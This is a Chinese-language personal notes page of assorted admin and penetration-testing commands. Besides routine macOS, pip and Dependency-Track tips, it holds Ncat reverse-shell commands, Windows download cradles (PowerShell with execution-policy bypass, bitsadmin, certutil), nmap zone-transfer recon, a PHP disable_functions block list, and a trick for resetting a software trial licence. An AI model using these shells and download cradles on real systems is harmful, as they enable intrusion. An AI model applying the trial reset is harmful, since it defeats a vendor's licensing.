杂记-1

在基于 Intel 的 Mac 上，您可以在启动时使用 Option-Command-R 来升级到与您的 Mac 兼容的最新版 macOS。

Command Line Tools (CLT) for Xcode

xcode-select --install

网络状态

Linux: sudo netstat -ntulp

Windows: netstat -ano

Python 2 下载文件

python -c "with open('/tmp/screenshot.png', 'wb') as f: import urllib2; f.write(urllib2.urlopen('http://sqlmap.org/images/screenshot.png').read())"

Windows命令行下载文件

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://sqlmap.org/images/screenshot.png', './screenshot.png')

bitsadmin /transfer d http://sqlmap.org/images/screenshot.png C:screenshot.png

certutil -urlcache -split -f http://sqlmap.org/images/screenshot.png

pip 缓存目录

%LOCALAPPDATA%pipcache

安装和更新 pip 和 setuptools

python -m pip install -U pip setuptools

PHP - disable_functions

disable_functions=chgrp,chown,chroot,dl,exec,ini_alter,ini_restore,ini_set,passthru,pfsockopen,phpinfo,popen,proc_get_status,proc_open,putenv,readlink,scandir,shell_exec,stream_socket_server,symlink,syslog,system

使用Ncat反弹Shell

ncat -l -n -v -p 9999

ncat -e /bin/sh 127.0.0.1 9999
ncat -e C:Windowssystem32cmd.exe 127.0.0.1 9999

利用NSE脚本检测域传送和证书透明度滥用

nslookup -type=NS <domain> <server>

nmap -p 53 --script dns-zone-transfer --script-args domain=<domain> <server> -oN <server>_dns_zone_transfer.nmap

nmap -sn -Pn --script hostmap-crtsh <domain> -oN <domain>_hostmap_crtsh.nmap

安装 Nmap 和 Ncat 软件包

rpm -vhU https://nmap.org/dist/nmap-7.91-1.x86_64.rpm
rpm -vhU https://nmap.org/dist/ncat-7.91-1.x86_64.rpm

myBase Desktop 6.5.1 无限期试用

清空安装目录下的 "nyfedit.ini" 文件的 "App.UserLic.FirstUseOn=" 配置项的值

Dependency-Track 进程管理

# 显示进程信息
ps aux | grep 'dependency-track' | grep -v 'grep'

# 显示 PID
ps aux | grep 'dependency-track' | grep -v 'grep' | awk '{print $2}'

# 终止第二个进程
sudo kill -SIGTERM $(ps aux | grep 'dependency-track' | grep -v 'grep' | awk 'NR==2 {print $2}')

Dependency-Track 日志管理

sudo ls -h -l /root/.dependency-track/

# 清空应用审核日志
sudo su - -c 'cat /dev/null > /root/.dependency-track/dependency-track-audit.log'

# 清空应用日志
sudo su - -c 'cat /dev/null > /root/.dependency-track/dependency-track.log'

# 清空嵌入式 Jetty 服务器日志
sudo su - -c 'cat /dev/null > /root/.dependency-track/server.log'